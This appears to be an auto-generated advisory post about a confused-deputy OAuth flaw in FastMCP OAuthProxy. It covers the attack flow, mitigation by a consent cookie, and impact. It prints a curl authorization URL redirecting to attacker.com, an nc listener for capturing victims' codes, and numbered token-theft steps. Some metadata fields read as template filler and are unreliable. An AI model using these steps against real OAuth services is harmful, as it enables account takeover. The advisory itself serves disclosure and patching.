FastMCP OAuthProxy, Confused Deputy Vulnerability, CVE-2024-53983 (Critical)

Listen to this Post

How the mentioned CVE works

The vulnerability exists in the FastMCP OAuthProxy’s `_handle_idp_callback` function, which fails to validate that the browser presenting the OAuth authorization code is the same entity that granted consent. An attacker initiates a legitimate OAuth flow with a malicious client to a benign MCP server, intercepting the GitHub authorization URL after consent. The victim, already logged into GitHub and previously authorized the benign server, is tricked into opening this URL. Because GitHub skips the consent page for previously authorized clients, the victim’s browser is immediately redirected to the OAuthProxy callback. The proxy, lacking any browser-bound state validation, accepts the valid `state` and `code` pair, exchanges it for an access token, and redirects to the attacker’s client callback URL with a new authorization code. The attacker then exchanges this code for an access token tied to the victim’s GitHub account, gaining unauthorized access to the MCP server resources.
Platform: FastMCP OAuthProxy
Version: Affected Versions
Vulnerability: Confused Deputy
Severity: Critical
date: 2026-03-31

Prediction: 2026-04-15

What Undercode Say:

Simulate capturing the authorization URL using an intercepting proxy
echo "Capture the GitHub authorization URL after consent:"
curl -v "https://github.com/login/oauth/authorize?client_id=ATTACKER_CLIENT&redirect_uri=http://attacker.com/callback&scope=repo&state=MALICIOUS_STATE"
Example of a malicious client callback server to log the authorization code
nc -lvp 8080
Expected input: GET /callback?code=VICTIM_CODE&state=MALICIOUS_STATE HTTP/1.1

Exploit:

  1. Attacker connects a malicious MCP client to the target MCP server.
  2. Intercepts the GitHub OAuth consent redirect URL using Burp Suite.
  3. Lures a victim (pre-authorized on GitHub) to open the captured URL.
  4. Victim’s browser is redirected to the OAuthProxy callback with a valid code.
  5. OAuthProxy exchanges code for token and redirects to attacker’s client callback.
  6. Attacker captures the returned code and exchanges it for an access token, impersonating the victim.

Protection from this CVE

Apply the upstream patch that introduces a consent cookie to bind the OAuth flow to the specific browser session. Ensure the OAuthProxy validates this cookie in the callback handler before exchanging the code for a token. Update to the latest version of FastMCP that implements the mitigations described in the MCP specification.

Impact

Unauthorized access to MCP server resources tied to the victim’s GitHub account. Account takeover of the MCP session, allowing data exfiltration, privilege escalation, or lateral movement within connected services.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top